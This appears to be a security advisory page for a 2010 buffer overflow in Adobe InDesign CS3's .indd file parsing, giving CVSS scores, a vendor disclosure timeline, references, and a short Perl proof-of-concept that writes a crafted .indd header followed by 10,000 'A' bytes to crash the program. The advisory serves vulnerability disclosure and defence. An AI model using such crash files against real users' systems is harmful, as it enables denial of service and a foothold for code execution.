9.3 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
7.5 High
AI Score
Confidence
High
0.227 Low
EPSS
Percentile
96.5%
Title: Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability
Advisory ID: ZSL-2010-4941
Type: Local/Remote
Impact: System Access, DoS
Risk: (4/5)
Release Date: 04.06.2010
Adobe® InDesign® CS3 software provides precise control over typography and built-in creative tools for designing, preflighting, and publishing documents for print, online, or to mobile devices. Include interactivity, animation, video, and sound in page layouts to fully engage readers.
When parsing .indd files to the application, it crashes instantly overwriting memory registers. Depending on the offset, EBP, EDI, EDX and ESI gets overwritten. Potential vulnerability use is arbitrary code execution and denial of service.
Adobe Systems Incorporated - <http://www.adobe.com>
CS3 10.0
Microsoft Windows XP Professional SP3 (English)
[16.09.2009] Vulnerability discovered.
[09.03.2010] Vulnerability reported to vendor with sent PoC files.
[21.03.2010] Asked confirmation from the vendor.
[21.03.2010] Vendor asked for PoC files due to communication errors.
[22.03.2010] Re-sent PoC files to vendor.
[04.04.2010] Vendor confirms vulnerability.
[03.06.2010] Vendor informs that they discontinued support for CS3 since CS5 is out.
[04.06.2010] Public advisory released.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
High five to Wendy and David
[1] <http://www.packetstormsecurity.org/filedesc/indesign-overflow.txt.html>
[2] <http://www.securityfocus.com/bid/40565>
[3] <http://securityreason.com/exploitalert/8325>
[4] <http://secunia.com/advisories/40050/>
[5] <http://www.juniper.net/security/auto/vulnerabilities/vuln40565.html>
[6] <http://xforce.iss.net/xforce/xfdb/59132>
[7] <http://www.securelist.com/ru/advisories/40050>
[8] <http://www.securitylab.ru/poc/394521.php>
[9] <http://www.vupen.com/english/advisories/2010/1347>
[10] <http://osvdb.org/show/osvdb/65140>
[11] <http://www.vfocus.net/art/20100604/7226.html>
[12] <http://www.exploit-db.com/exploits/13817/>
[13] <http://net-security.org/vuln.php?id=12889>
[14] <https://vulners.com/cve/CVE-2010-2321>
[15] <https://nvd.nist.gov/vuln/detail/CVE-2010-2321>
[04.06.2010] - Initial release
[05.06.2010] - Added reference [3], [4], [5], [6] and [7]
[06.06.2010] - Added reference [8], [9] and [10]
[07.06.2010] - Added reference [11]
[11.06.2010] - Added reference [12]
[14.06.2010] - Added reference [13]
[25.10.2021] - Added reference [14] and [15]
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>#!/usr/bin/perl
#
# Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability
#
# Vendor: Adobe Systems Inc.
#
# Product Web Page: http://www.adobe.com
#
# Version tested: CS3 10.0
#
# Summary: Adobe� InDesign� CS3 software provides precise control over
# typography and built-in creative tools for designing, preflighting,
# and publishing documents for print, online, or to mobile devices. Include
# interactivity, animation, video, and sound in page layouts to fully engage
# readers.
#
# Desc: When parsing .indd files to the application, it crashes instantly
# overwriting memory registers. Depending on the offset, EBP, EDI, EDX and
# ESI gets overwritten. Pottential vulnerability use is arbitrary code execution
# and denial of service.
#
#
# Tested on Microsoft Windows XP Professional SP3 (English)
#
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# Zero Science Lab - http://www.zeroscience.mk
#
# 16.09.2009
#
#
#
# Vendor status:
#
# [16.09.2009] Vulnerability discovered.
# [09.03.2010] Vulnerability reported to vendor with sent PoC files.
# [21.03.2010] Asked confirmation from the vendor.
# [21.03.2010] Vendor asked for PoC files due to communication errors.
# [22.03.2010] Re-sent PoC files to vendor.
# [04.04.2010] Vendor confirms vulnerability.
# [03.06.2010] Vendor informs that they discontinued support for CS3 since CS5 is out.
# [04.06.2010] Public advisory released.
#
#
# Zero Science Lab Advisory ID: ZSL-2010-4941
# Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4941.php
#
#
#
# Raw PoC code:
#
$header = "\x06\x06\xED\xF5\xD8\x1D\x46\xE5\xBD\x31\xEF\xE7\xFE\x74\xB7\x1D\x44\x4F\x43\x55\x4D\x45\x4E\x54\x01";
$fn = "teppei.indd";
$bof = "\x41" x 10000;
print "\n\n[*] Creating PoC file: $fn ...\r\n";
sleep(1);
open(indd, ">./$fn") || die "\n\aCannot open $fn : $!";
print indd "$header" . "$bof";
close (indd);
print "\n[*] PoC file successfully created!\r\n";</p></body></html>